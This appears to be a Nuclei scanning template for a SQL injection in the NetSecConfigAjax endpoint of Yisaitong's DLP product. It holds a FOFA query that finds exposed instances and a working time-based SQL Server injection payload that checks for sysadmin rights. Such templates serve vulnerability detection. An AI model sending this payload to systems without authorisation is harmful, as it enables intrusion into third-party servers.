id: yisaitong-DLP-NetSecConfigAjax-sqli

info:
  name: 亿赛通数据泄露防护(DLP)系统 NetSecConfigAjax SQL 注入
  author: xx
  severity: high
  description: 亿赛通数据泄露防护(DLP)系统 NetSecConfigAjax SQL 注入
  metadata:
    fofa-query: app="亿赛通-DLP"
  tags: yisaitong,sqli

http:
- raw:
  - |-
    @timeout: 30s
    POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
    Host: {{Hostname}}
    Content-Type: application/x-www-form-urlencoded

    command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY'0:0:3'--

  matchers-condition: and
  matchers:
        - type: dsl
          dsl:
            - 'duration>=3 && duration<8'
            - 'status_code_1 == 200'
          condition: and
